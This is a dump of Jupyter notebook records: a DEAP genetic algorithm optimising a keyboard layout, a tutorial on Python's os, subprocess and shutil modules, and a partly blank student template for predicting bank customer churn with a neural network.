keys)\n return [compute_cost(''.join(list(individual)), corpus)]\n except AssertionError:\n return [np.inf]\n\ndef mutFlip(ind1, ind2):\n \"\"\"Execute a two points crossover with copy on the input individuals. The\n copy is required because the slicing in numpy returns a view of the data,\n which leads to a self overwritting in the swap operation.\n \"\"\"\n\n ind = ind1.copy()\n for x, value in np.ndenumerate(ind):\n if np.random.random() < .05:\n ind[x] = np.random.choice(keys_list)\n try:\n check_keyboard(ind, keys)\n return ind, ind2\n except AssertionError:\n return mutFlip(individual, ind2)\n \n return ind, ind2\n", "_____no_output_____" ], [ "creator.create('FitnessMin', base.Fitness, weights=(-1.0,))\ncreator.create('Individual', np.ndarray, fitness=creator.FitnessMin)\n\ntoolbox = base.Toolbox()\n\n# Tool to randomly initialize an individual\ntoolbox.register('attribute',\n np.random.permutation, np.array(list(baseline))\n)\n\ntoolbox.register('individual',\n tools.initIterate,\n creator.Individual,\n toolbox.attribute\n)\n\ntoolbox.register('population',\n tools.initRepeat,\n list,\n toolbox.individual\n)\n\ntoolbox.register(\"evaluate\", evaluate)\ntoolbox.register(\"mate\", tools.cxOnePoint)\ntoolbox.register(\"mutate\", tools.mutShuffleIndexes, indpb=0.05)\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\ndef main():\n np.random.seed(64)\n\n pop = toolbox.population(n=20)\n\n # Numpy equality function (operators.eq) between two arrays returns the\n # equality element wise, which raises an exception in the if similar()\n # check of the hall of fame. Using a different equality function like\n # numpy.array_equal or numpy.allclose solve this issue.\n hof = tools.HallOfFame(1, similar=np.array_equal)\n\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", np.mean)\n stats.register(\"std\", np.std)\n stats.register(\"min\", np.min)\n stats.register(\"max\", np.max)\n\n algorithms.eaSimple(pop, toolbox, cxpb=0, mutpb=0.6, ngen=1000, stats=stats,\n halloffame=hof)\n\n return pop, stats, hof\n\n\npop, stats, hof = main()\n", "gen\tnevals\tavg \tstd \tmin \tmax \n0 \t20 \t230711\t11730.7\t211328\t253526\n1 \t15 \t222479\t8550.19\t209768\t236974\n2 \t12 \t214193\t5623.62\t207266\t225510\n3 \t10 \t211550\t3468.81\t207065\t217218\n4 \t17 \t210912\t4420.74\t202385\t220128\n5 \t15 \t210301\t5659 \t203495\t225716\n6 \t12 \t207232\t4177.73\t201347\t222048\n7 \t13 \t204788\t3706.67\t197492\t211939\n8 \t14 \t204308\t8192.06\t194556\t230339\n9 \t8 \t200895\t4927.39\t194556\t214215\n10 \t12 \t199904\t6442.03\t194556\t218699\n11 \t11 \t197678\t5048.9 \t191092\t209712\n12 \t11 \t197839\t6423.91\t191092\t214188\n13 \t11 \t195342\t3585.77\t191092\t206202\n14 \t13 \t197410\t7784.7 \t184579\t221685\n15 \t15 \t194385\t3853 \t184615\t202499\n16 \t13 \t194296\t4752.53\t184615\t210685\n17 \t10 \t192349\t4214.85\t184615\t206343\n18 \t12 \t193349\t7550.42\t184527\t210265\n19 \t11 \t190577\t4752.73\t184527\t198599\n20 \t10 \t187571\t6122.38\t182779\t209967\n21 \t10 \t187279\t4831.65\t181872\t200383\n22 \t14 \t185843\t3544.15\t181872\t196038\n23 \t9 \t186302\t6123.17\t180905\t209643\n24 \t9 \t183227\t2155.48\t180905\t189297\n25 \t11 \t184535\t5611.92\t180340\t196771\n26 \t11 \t182395\t4585.51\t177575\t197738\n27 \t12 \t184535\t6207.96\t177575\t200388\n28 \t10 \t182443\t6489.68\t176577\t196782\n29 \t13 \t181069\t4430.22\t176577\t194684\n30 \t10 \t182859\t6988.37\t176522\t198157\n31 \t10 \t182038\t7790.69\t176522\t208959\n32 \t14 \t182398\t6291.71\t176577\t195197\n33 \t10 \t181843\t8256.59\t176577\t212704\n34 \t14 \t182574\t9288.34\t176502\t217502\n35 \t13 \t183934\t8684.5 \t176502\t212740\n36 \t14 \t181658\t6360.25\t176413\t197009\n37 \t12 \t182478\t6336.01\t176413\t196384\n38 \t12 \t180112\t5008.14\t175503\t193652\n39 \t12 \t181617\t6438.65\t174377\t200574\n40 \t10 \t183045\t8858.05\t174377\t201925\n41 \t15 \t181915\t6589.23\t175195\t199162\n42 \t8 \t180400\t5538.84\t175195\t193975\n43 \t14 \t179930\t5613.02\t175195\t194874\n44 \t16 \t181333\t7880.09\t175195\t202496\n45 \t10 \t179740\t4403.31\t174646\t187881\n46 \t8 \t178819\t4677.32\t174646\t191459\n47 \t9 \t177792\t5738.86\t174646\t194209\n48 \t11 \t178618\t7246.05\t174571\t201443\n49 \t8 \t176368\t3453.6 \t174325\t188301\n50 \t14 \t179246\t5620.92\t174646\t194244\n51 \t12 \t178292\t5172.56\t173336\t189574\n52 \t13 \t179485\t6873.19\t174646\t201679\n53 \t8 \t176438\t3600.03\t174646\t190088\n54 \t17 \t181210\t5375.86\t174646\t190507\n55 \t12 \t181785\t6417.51\t174646\t199822\n56 \t13 \t182406\t9849.71\t174646\t212548\n57 \t9 \t179617\t6538.78\t174582\t198882\n58 \t14 \t180167\t7892.95\t173681\t204530\n59 \t12 \t177069\t4112.44\t174036\t185971\n60 \t12 \t180362\t8411.76\t174036\t203764\n61 \t11 \t180600\t7480.89\t174178\t198143\n62 \t11 \t180769\t7709.31\t174178\t200135\n63 \t11 \t180500\t7571.47\t174178\t202709\n64 \t9 \t177210\t4672.29\t174178\t193642\n65 \t13 \t176781\t3333.4 \t174178\t185340\n66 \t13 \t179430\t6582.26\t174088\t199153\n67 \t13 \t180419\t8318.97\t174088\t206448\n68 \t13 \t179073\t5743.28\t172496\t191052\n69 \t10 \t177456\t7233.7 \t172496\t202823\n70 \t12 \t178707\t6916.89\t172496\t193401\n71 \t9 \t176651\t5885.87\t172496\t190207\n72 \t13 \t178697\t6525.38\t172496\t191481\n73 \t11 \t179656\t7404.97\t172496\t192110\n74 \t14 \t181049\t10354.1\t171997\t206155\n75 \t13 \t179094\t8693.91\t171997\t197229\n76 \t13 \t177101\t6647.08\t171997\t196992\n77 \t13 \t178174\t7962.03\t171756\t198465\n78 \t11 \t175583\t6038.76\t170625\t193685\n79 \t11 \t173884\t4991.44\t169447\t190684\n80 \t10 \t173983\t4347.84\t169447\t184706\n81 \t12 \t175084\t6906.59\t167546\t192319\n82 \t13 \t175975\t8375.29\t167546\t196819\n83 \t7 \t171575\t5757.11\t167342\t184955\n84 \t12 \t172388\t6006.8 \t167342\t190256\n85 \t11 \t170481\t3594.39\t167302\t181407\n86 \t12 \t174506\t9805.36\t167302\t196027\n87 \t13 \t171691\t5318.97\t164995\t181548\n88 \t15 \t170627\t4565.68\t164995\t182858\n89 \t12 \t170967\t5831.86\t164995\t185501\n90 \t15 \t171523\t6346.49\t164995\t189328\n91 \t15 \t172581\t7857.83\t165038\t196295\n92 \t14 \t171328\t5679.7 \t165038\t187777\n93 \t11 \t173599\t8436.08\t165038\t201001\n94 \t12 \t170483\t7129.31\t165038\t192735\n95 \t11 \t167963\t3931.45\t165038\t179160\n96 \t14 \t173219\t10385.3\t164871\t205740\n97 \t11 \t171560\t6572.61\t165038\t182311\n98 \t12 \t172708\t9055.16\t165038\t193779\n99 \t10 \t169903\t9116.58\t164265\t199570\n100\t13 \t170773\t5572.86\t165038\t185380\n101\t13 \t173633\t8921.25\t165038\t197209\n102\t12 \t173301\t7131.17\t164760\t184754\n103\t14 \t173760\t10320.9\t164197\t196778\n104\t10 \t170185\t9394.72\t164197\t199671\n105\t9 \t166327\t3610.49\t164197\t177634\n106\t10 \t167013\t4708.33\t164197\t184340\n107\t17 \t175193\t9952.64\t164197\t193980\n108\t13 \t169386\t4914.86\t164197\t183130\n109\t14 \t172906\t9068.78\t163166\t194614\n110\t12 \t171771\t10347.5\t163166\t198590\n111\t12 \t167348\t5106.06\t163166\t182036\n112\t12 \t166964\t4798.41\t163166\t177070\n113\t17 \t169818\t5721.64\t163166\t178858\n114\t7 \t166967\t7969.63\t163166\t192849\n115\t11 \t166782\t5393.36\t163166\t186277\n116\t13 \t168037\t5130.24\t163166\t179159\n117\t9 \t168431\t7581.31\t163166\t190881\n118\t13 \t167737\t5082.46\t163166\t179668\n119\t14 \t172820\t9316.87\t163166\t194549\n120\t10 \t170830\t8370.02\t163166\t191847\n121\t13 \t168564\t8524.02\t163166\t193959\n122\t12 \t170065\t9852.19\t163166\t193709\n123\t15 \t170540\t7672.06\t163166\t185758\n124\t8 \t167090\t6368.98\t163166\t182635\n125\t11 \t166840\t6301.73\t163166\t181559\n126\t8 \t165616\t4281.25\t163166\t181152\n127\t10 \t166131\t6722.53\t163166\t192394\n128\t13 \t167027\t6837.96\t162876\t192061\n129\t10 \t166753\t5684.07\t163166\t183298\n130\t11 \t170795\t10614.4\t163166\t204719\n131\t11 \t170351\t9718.45\t163166\t192580\n132\t11 \t170641\t10048.3\t163166\t198160\n133\t13 \t168463\t7047.36\t163166\t188973\n134\t12 \t167177\t5283.04\t163166\t180947\n135\t13 \t166072\t4566.28\t163166\t178533\n136\t14 \t171450\t8909.09\t163166\t188737\n137\t14 \t168794\t6662.18\t163166\t184530\n138\t11 \t169133\t8691.14\t161695\t193449\n139\t11 \t167483\t6037.18\t161695\t182014\n140\t12 \t168132\t6301 \t161695\t187202\n141\t6 \t168798\t9503.84\t161695\t197025\n142\t9 \t166489\t5122.38\t161695\t181379\n143\t12 \t171232\t10449 \t161695\t195839\n144\t13 \t169890\t10017.3\t161695\t199594\n145\t15 \t168858\t11593.3\t161355\t213691\n146\t11 \t166717\t6508.59\t161306\t185649\n147\t10 \t166574\t7034.82\t161137\t183914\n148\t14 \t166047\t6473.04\t161355\t178072\n149\t9 \t165694\t7330.41\t161355\t189956\n150\t15 \t168371\t7330.73\t161355\t184767\n151\t15 \t171668\t8337 \t161355\t189535\n152\t11 \t167545\t4521.45\t161355\t179237\n153\t7 \t165862\t5091.14\t161355\t180796\n154\t11 \t165960\t5355.06\t161555\t179945\n155\t7 \t167833\t9778.81\t161555\t194134\n156\t12 \t165972\t5558.08\t161555\t176910\n157\t14 \t165920\t5549.04\t161555\t180260\n158\t16 \t168336\t8344.66\t161555\t197049\n159\t11 \t167740\t9128.43\t161555\t193941\n160\t12 \t166046\t5371.02\t161555\t179059\n161\t16 \t169438\t8607.4 \t161555\t191226\n162\t13 \t168888\t7318.33\t161555\t191511\n163\t11 \t168086\t7923.72\t161555\t192995\n164\t11 \t166100\t5833.23\t161555\t184096\n165\t12 \t166436\t5558.09\t161555\t179561\n166\t11 \t167041\t8444.18\t161555\t189875\n167\t12 \t168754\t9553.91\t161555\t192033\n168\t10 \t166234\t5665.42\t161555\t180845\n169\t10 \t164948\t5095.38\t161555\t182528\n170\t14 \t170754\t11081.6\t161555\t203584\n171\t11 \t166915\t6234.59\t161239\t182740\n172\t12 \t169654\t9303.54\t161555\t196916\n173\t14 \t167514\t6553.04\t161555\t181657\n174\t10 \t168643\t11881.7\t160984\t206204\n175\t10 \t165756\t6996.1 \t160984\t191283\n176\t7 \t165683\t8068.27\t160984\t191333\n177\t12 \t170644\t9927.57\t160984\t192660\n178\t11 \t166709\t6830.31\t161555\t185898\n179\t12 \t167440\t8638.28\t161555\t186510\n180\t13 \t165195\t5595.88\t160995\t183680\n181\t10 \t166771\t8181.47\t160995\t186450\n182\t7 \t164105\t5388.9 \t160995\t181226\n183\t12 \t166890\t8115.35\t160995\t188081\n184\t12 \t166559\t6618.23\t160995\t183637\n185\t14 \t167931\t6236.71\t160995\t178720\n186\t9 \t171275\t14501.8\t160995\t221580\n187\t12 \t168542\t11564.8\t160995\t211673\n188\t12 \t167217\t8075.74\t160995\t189707\n189\t10 \t164718\t5102.39\t160995\t180096\n190\t13 \t167763\t8632.89\t160995\t191313\n191\t13 \t167060\t9652.14\t160995\t200076\n192\t14 \t167205\t8477.47\t161312\t197058\n193\t15 \t166268\t5021.67\t161312\t180602\n194\t15 \t170248\t8295.61\t161312\t187857\n195\t12 \t169758\t8349.08\t161312\t186459\n196\t15 \t173258\t9325.69\t161312\t194145\n197\t11 \t167862\t7797.4 \t161312\t198840\n198\t12 \t166032\t3400.65\t161312\t172686\n199\t15 \t167423\t7578.85\t162497\t189425\n200\t13 \t168163\t6730.3 \t162497\t186318\n201\t12 \t165541\t4688.54\t161554\t179886\n202\t14 \t168997\t7175.44\t161554\t183345\n203\t10 \t169765\t7796.96\t162497\t188678\n" ], [ "''.join(list(hof)[0])", "_____no_output_____" ], [ "check_keyboard(''.join(list(hof)[0]), keys)\ncompute_cost(''.join(list(hof)[0]), corpus)", "_____no_output_____" ], [ "check_keyboard(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', keys)\ncompute_cost(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', corpus)", "_____no_output_____" ] ], [ [ "## Hall of fame solutions\n\n ' ONYTIAIMZGBCHEDRSL,P#.^0TQX VK?W<JFU' - 1673.418\n ' REASTO<DGWVPMILNYHTJC ^0. #?X,QUBZFK' - 1637.709\n ' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q' - 1582.775\n 'T OISLADERNMGW #UYHTVKCFPX<, ?ZJ.0^BQ' - 1597.119\n 'OSNA ETM GWYPRLV HI#.0^<J?BKC,FTUDQZX' - 1599.910", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ] ]
cb1c3be403ac281f897d9e3eab9d04f2f6519869
10,426
ipynb
Jupyter Notebook
Notebooks/06_Manipulating_command_line/Command_line.ipynb
Anthogr/Snakes-in-Space
53a3581bacbff45818495222dc3233e1838b88ac
[ "MIT" ]
null
null
null
Notebooks/06_Manipulating_command_line/Command_line.ipynb
Anthogr/Snakes-in-Space
53a3581bacbff45818495222dc3233e1838b88ac
[ "MIT" ]
null
null
null
Notebooks/06_Manipulating_command_line/Command_line.ipynb
Anthogr/Snakes-in-Space
53a3581bacbff45818495222dc3233e1838b88ac
[ "MIT" ]
1
2021-09-08T13:18:54.000Z
2021-09-08T13:18:54.000Z
24.474178
113
0.503357
[ [ [ "# Manipulating the command line", "_____no_output_____" ] ], [ [ "import os\n\nimport subprocess\n\nimport shutil", "_____no_output_____" ] ], [ [ "# OS", "_____no_output_____" ] ], [ [ "# See contents of directory\nos.listdir('/mnt/GEN2212/')", "_____no_output_____" ], [ "# Loop over objects in directory\nfor obj in os.listdir('/mnt/GEN2212/'):\n # See if it is a directory\n if os.path.isdir('/mnt/GEN2212/' + obj):\n print(\"Directory:\\t\", obj)\n else:\n print(\"File:\\t\", obj)", "Directory:\t GEN2212.dtardif\nDirectory:\t GEN2212.qpillot\nDirectory:\t GEN2212.wbanfield\nDirectory:\t GEN2212.atoumoulin\nDirectory:\t GEN2212.apohl\nDirectory:\t GEN2212.mlaugie\nDirectory:\t GEN2212.ydonnadieu\nDirectory:\t GEN2212.asarr\nFile:\t maxs_mins_consecutive.ipynb\nDirectory:\t GEN2212.jsayago\n" ], [ "# Acces enviroment variables\nos.environ['HOME']", "_____no_output_____" ], [ "os.listdir(os.environ['HOME'])", "_____no_output_____" ] ], [ [ "# Subprocess", "_____no_output_____" ], [ "The cell below only works in jupyter ", "_____no_output_____" ] ], [ [ "!ls -al /mnt/GEN2212/", "total 27945\ndrwxrwx--- 11 root CEREGE_GEN2212 12 Apr 8 10:47 .\ndrwxr-xr-x 3 root root 4096 Sep 21 2018 ..\ndrwxr-x--x 18 apohl CEREGE_GEN2212 20 Feb 26 10:09 GEN2212.apohl\ndrwxr-xr-x 10 asarr CEREGE_GEN2212 20 May 5 17:51 GEN2212.asarr\ndrwxr-x--x 2 atoumoulin CEREGE_GEN2212 2 Sep 21 2018 GEN2212.atoumoulin\ndrwxr-xr-x 5 dtardif CEREGE_GEN2212 5 May 7 11:36 GEN2212.dtardif\ndrwxr-xr-x 5 jsayago CEREGE_GEN2212 5 Apr 26 13:45 GEN2212.jsayago\ndrwxr-x--x 4 mlaugie CEREGE_GEN2212 4 Apr 2 11:42 GEN2212.mlaugie\ndrwxr-xr-x 5 qpillot CEREGE_GEN2212 5 Mar 22 10:45 GEN2212.qpillot\ndrwxr-xr-x 11 wbanfield CEREGE_GEN2212 18 Apr 23 12:41 GEN2212.wbanfield\ndrwxr-x--x 7 ydonnadieu CEREGE_GEN2212 22 Apr 16 19:28 GEN2212.ydonnadieu\n-rw-r--r-- 1 jsayago CEREGE_GEN2212 28225795 Apr 8 10:46 maxs_mins_consecutive.ipynb\n" ] ], [ [ "A Few libraries exist:\n- os.popen\n- sys.?\n- subprocess\n\nHowever subprocess seems to be the most built out for \"complex\" tasks.\n\nTo get the results use `stdout=subprocess.PIPE` then `output.stdout.readlines()`", "_____no_output_____" ] ], [ [ "output = subprocess.Popen(['ls', '-al', '/mnt/GEN2212'], stdout=subprocess.PIPE)", "_____no_output_____" ], [ "lines = output.stdout.readlines()\nlines", "_____no_output_____" ] ], [ [ "We can then manipulate the output like strings to get info", "_____no_output_____" ] ], [ [ "for line in lines:\n line = line.decode('utf-8')\n if \"wbanfield\" in line:\n print(line)\n line = line.split(\" \")\n line = [obj for obj in line if len(obj) > 0]\n print(line)\n perm, uid, user, group, day, month, _, time, directory = line", "drwxr-xr-x 11 wbanfield CEREGE_GEN2212 18 Apr 23 12:41 GEN2212.wbanfield\n\n['drwxr-xr-x', '11', 'wbanfield', 'CEREGE_GEN2212', '18', 'Apr', '23', '12:41', 'GEN2212.wbanfield\\n']\n" ], [ "perm", "_____no_output_____" ], [ "user", "_____no_output_____" ] ], [ [ "`.wait()` waits for a process to finish before continuing to the next one.\n`cwd` argument defines the directory from which the command is executed", "_____no_output_____" ] ], [ [ "proc1 = subprocess.Popen([\"sleep\", \"2\"], cwd=\"/mnt/GEN2212\").wait()\nproc2 = subprocess.Popen([\"sleep\", \"3\"], cwd=\"/mnt\").wait()", "_____no_output_____" ] ], [ [ "# File manipulation\n\n- 'r' -> read only\n- 'a' -> create if doesn't exist else append\n- 'w' -> write this overwrites the file if it exists", "_____no_output_____" ] ], [ [ "with open(\"ferret.jnl\", \"r\") as f:\n print(\"\\n\".join(f.readlines()))", " ! NOAA/PMEL TMAP\n\n ! PyFerret v7.63 (optimized)\n\n ! Linux 4.15.0-1096-azure - 10/13/20\n\n ! 15-Apr-21 13:30 \n\n\n\nset mode verify\n\nno\n\nexit\n\n" ], [ "with open(\"dummy.txt\", 'w') as f:\n print(f\"User : {user} owns the Folder {directory}\")\n f.write(f\"User : {user} owns the Folder {directory}\")", "User : wbanfield owns the Folder GEN2212.wbanfield\n\n" ] ], [ [ "# Shutil", "_____no_output_____" ] ], [ [ "# Remove all objects under given directory -> equivalent to rm -rf\nshutil.rmtree(\"DIRECTORY\")", "_____no_output_____" ], [ "# Copy files (and folders?)\nshutil.copy2(source, dest)", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1c41e75008ea57185b6c473857d624d1625b6e
32,594
ipynb
Jupyter Notebook
M4 Data Mining/W4 Artificial Nural Network/Neural Networks - Churn Prediction - Student File Aug 6.ipynb
fborrasumh/greatlearning-pgp-dsba
2aff5e00f8d6a60e1d819b970901492af703de85
[ "MIT" ]
1
2021-12-04T12:11:50.000Z
2021-12-04T12:11:50.000Z
M4 Data Mining/W4 Artificial Nural Network/Neural Networks - Churn Prediction - Student File Aug 6.ipynb
fborrasumh/greatlearning-pgp-dsba
2aff5e00f8d6a60e1d819b970901492af703de85
[ "MIT" ]
null
null
null
M4 Data Mining/W4 Artificial Nural Network/Neural Networks - Churn Prediction - Student File Aug 6.ipynb
fborrasumh/greatlearning-pgp-dsba
2aff5e00f8d6a60e1d819b970901492af703de85
[ "MIT" ]
1
2022-03-20T07:01:46.000Z
2022-03-20T07:01:46.000Z
20.460766
327
0.522489
[ [ [ "# Problem Statement\nCustomer churn and engagement has become one of the top issues for most banks. It costs significantly more to acquire new customers than retain existing. It is of utmost important for a bank to retain its customers. \n \nWe have a data from a MeBank (Name changed) which has a data of 7124 customers. In this data-set we have a dependent variable “Exited” and various independent variables. \n \nBased on the data, build a model to predict when the customer will exit the bank. Split the data into Train and Test dataset (70:30), build the model on Train data-set and test the model on Test-dataset. Secondly provide recommendations to the bank so that they can retain the customers who are on the verge of exiting.\n", "_____no_output_____" ], [ "# Data Dictionary\n<b>CustomerID</b> - Bank ID of the Customer \n<b>Surname</b> - Customer’s Surname \n<b>CreditScore</b> - Current Credit score of the customer \n<b>Geography</b> - Current country of the customer \n<b>Gender</b> - Customer’s Gender \n<b>Age</b> - Customer’s Age \n<b>Tenure</b> - Customer’s duration association with bank in years \n<b>Balance</b> - Current balance in the bank account. \n<b>Num of Dependents</b> - Number of dependents \n<b>Has Crcard</b> - 1 denotes customer has a credit card and 0 denotes customer does not have a credit card \n<b>Is Active Member</b> - 1 denotes customer is an active member and 0 denotes customer is not an active member \n<b>Estimated Salary</b> - Customer’s approx. salary \n<b>Exited</b> - 1 denotes customer has exited the bank and 0 denotes otherwise ", "_____no_output_____" ], [ "### Load library and import data", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neural_network import MLPClassifier", "_____no_output_____" ], [ "churn=pd.read_csv(\"Churn_Modelling.csv\")", "_____no_output_____" ] ], [ [ "### Inspect the data", "_____no_output_____" ] ], [ [ "churn.head()", "_____no_output_____" ], [ "churn.info()", "_____no_output_____" ] ], [ [ "Age and Balance variable has numeric data but data type is object. It appears some special character is present in this variable. \nAlso there are missing values for some variables.", "_____no_output_____" ], [ "# EDA", "_____no_output_____" ], [ "### Removing unwanted variables", "_____no_output_____" ] ], [ [ "# remove the variables and check the data for the 10 rows \n\n\n\nchurn.head(10)", "_____no_output_____" ] ], [ [ "Checking dimensions after removing unwanted variables,", "_____no_output_____" ], [ "### Summary", "_____no_output_____" ] ], [ [ "churn.describe(include=\"all\")", "_____no_output_____" ], [ "churn.shape", "_____no_output_____" ] ], [ [ "### Proportion of observations in Target classes", "_____no_output_____" ] ], [ [ "# Get the proportions\n\n\n", "_____no_output_____" ] ], [ [ "### Checking for Missing values", "_____no_output_____" ] ], [ [ "# Are there any missing values ?\n\n\n\n", "_____no_output_____" ] ], [ [ "There are some missing values", "_____no_output_____" ], [ "### Checking for inconsistencies in Balance and Age variable", "_____no_output_____" ] ], [ [ "churn.Balance.sort_values()", "_____no_output_____" ] ], [ [ "There are 3 cases where '?' is present, and 3 cases where missing values are present for Balance variable. \nSummary also proves the count of missing variables. \nTo confirm on the count of ? , running value_counts()", "_____no_output_____" ] ], [ [ "churn.Balance.value_counts()", "_____no_output_____" ], [ "churn[churn.Balance==\"?\"]", "_____no_output_____" ] ], [ [ "This confirms there are 3 cases having ?", "_____no_output_____" ] ], [ [ "churn.Age.value_counts().sort_values()", "_____no_output_____" ] ], [ [ "There is 1 case where ? is present", "_____no_output_____" ], [ "### Replacing ? as Nan in Age and Balance variable", "_____no_output_____" ] ], [ [ "\n\n\n", "_____no_output_____" ] ], [ [ "Verifying count of missing values for Age and Balance variable below:", "_____no_output_____" ] ], [ [ "churn.Balance.isnull().sum()", "_____no_output_____" ], [ "churn.Age.isnull().sum()", "_____no_output_____" ] ], [ [ "### Imputing missing values", "_____no_output_____" ] ], [ [ "sns.boxplot(churn['Credit Score'])", "_____no_output_____" ] ], [ [ "As Outliers are present in the \"Credit Score\", so we impute the null values by median", "_____no_output_____" ] ], [ [ "sns.boxplot(churn['Tenure'])", "_____no_output_____" ], [ "sns.boxplot(churn['Estimated Salary'])", "_____no_output_____" ] ], [ [ "Substituting the mean value for all other numeric variables", "_____no_output_____" ] ], [ [ "for column in churn[['Credit Score', 'Tenure', 'Estimated Salary']]:\n mean = churn[column].mean()\n churn[column] = churn[column].fillna(mean)", "_____no_output_____" ], [ "churn.isnull().sum()", "_____no_output_____" ] ], [ [ "### Converting Object data type into Categorical", "_____no_output_____" ] ], [ [ "for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:\n if churn[column].dtype == 'object':\n churn[column] = pd.Categorical(churn[column]).codes ", "_____no_output_____" ], [ "churn.head()", "_____no_output_____" ], [ "churn.info()", "_____no_output_____" ] ], [ [ "### Substituting the mode value for all categorical variables", "_____no_output_____" ] ], [ [ "for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:\n mode = churn[column].mode()\n churn[column] = churn[column].fillna(mode[0])", "_____no_output_____" ], [ "churn.isnull().sum()", "_____no_output_____" ] ], [ [ "Age and Balance are still not addressed. Getting the modal value", "_____no_output_____" ] ], [ [ "churn['Balance'].mode()", "_____no_output_____" ], [ "churn['Age'].mode()", "_____no_output_____" ] ], [ [ "Replacing nan with modal values,", "_____no_output_____" ] ], [ [ "churn['Balance']=churn['Balance'].fillna(3000)\nchurn['Age']=churn['Age'].fillna(37)", "_____no_output_____" ], [ "churn.isnull().sum()", "_____no_output_____" ] ], [ [ "There are no more missing values.", "_____no_output_____" ] ], [ [ "churn.info()", "_____no_output_____" ] ], [ [ "Age and Balance are still object, which has to be converted", "_____no_output_____" ], [ "### Converting Age and Balance to numeric variables", "_____no_output_____" ] ], [ [ "churn['Age']=churn['Age'].astype(str).astype(int)\nchurn['Balance']=churn['Balance'].astype(str).astype(float)", "_____no_output_____" ] ], [ [ "### Checking for Duplicates", "_____no_output_____" ] ], [ [ "# Are there any duplicates ?\ndups = churn.duplicated()\nprint('Number of duplicate rows = %d' % (dups.sum()))\nchurn[dups]", "_____no_output_____" ] ], [ [ "There are no Duplicates", "_____no_output_____" ], [ "### Checking for Outliers", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(15,15))\nchurn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].boxplot(vert=0)", "_____no_output_____" ] ], [ [ "Very small number of outliers are present, which is also not significant as it will not affect much on ANN Predictions", "_____no_output_____" ], [ "### Checking pairwise distribution of the continuous variables", "_____no_output_____" ] ], [ [ "import seaborn as sns\nsns.pairplot(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']])", "_____no_output_____" ] ], [ [ "### Checking for Correlations", "_____no_output_____" ] ], [ [ "# construct heatmap with only continuous variables\nplt.figure(figsize=(10,8))\nsns.set(font_scale=1.2)\nsns.heatmap(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].corr(), annot=True)", "_____no_output_____" ] ], [ [ "There is hardly any correlation between the variables", "_____no_output_____" ], [ "### Train Test Split", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split", "_____no_output_____" ], [ "#Extract x and y\n\n\n\n", "_____no_output_____" ], [ "#split data into 70% training and 30% test data\n\n\n", "_____no_output_____" ], [ "# Checking dimensions on the train and test data\nprint('x_train: ',x_train.shape)\nprint('x_test: ',x_test.shape)\nprint('y_train: ',y_train.shape)\nprint('y_test: ',y_test.shape)", "_____no_output_____" ] ], [ [ "### Scaling the variables", "_____no_output_____" ] ], [ [ "from sklearn.preprocessing import StandardScaler", "_____no_output_____" ], [ "#Initialize an object for StandardScaler\n\n\n", "_____no_output_____" ], [ "#Scale the training data\n\n\n", "_____no_output_____" ], [ "x_train", "_____no_output_____" ], [ "# Apply the transformation on the test data\nx_test = sc.transform(x_test)", "_____no_output_____" ], [ "x_test", "_____no_output_____" ] ], [ [ "### Building Neural Network Model", "_____no_output_____" ] ], [ [ "clf = MLPClassifier(hidden_layer_sizes=100, max_iter=5000,\n solver='sgd', verbose=True, random_state=21,tol=0.01)", "_____no_output_____" ], [ "# Fit the model on the training data\n\n\n", "_____no_output_____" ] ], [ [ "### Predicting training data", "_____no_output_____" ] ], [ [ "# use the model to predict the training data\ny_pred = \n\n\n", "_____no_output_____" ] ], [ [ "### Evaluating model performance on training data", "_____no_output_____" ] ], [ [ "from sklearn.metrics import confusion_matrix,classification_report", "_____no_output_____" ], [ "confusion_matrix(y_train,y_pred)", "_____no_output_____" ], [ "print(classification_report(y_train, y_pred))", "_____no_output_____" ], [ "# AUC and ROC for the training data\n# predict probabilities\nprobs = clf.predict_proba(x_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(y_train, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(y_train, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()", "_____no_output_____" ] ], [ [ "### Predicting Test Data and comparing model performance", "_____no_output_____" ] ], [ [ "y_pred = clf.predict(x_test)", "_____no_output_____" ], [ "confusion_matrix(y_test, y_pred)", "_____no_output_____" ], [ "print(classification_report(y_test, y_pred))", "_____no_output_____" ], [ "# AUC and ROC for the test data\n\n# predict probabilities\nprobs = clf.predict_proba(x_test)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nauc = roc_auc_score(y_test, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfpr, tpr, thresholds = roc_curve(y_test, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()", 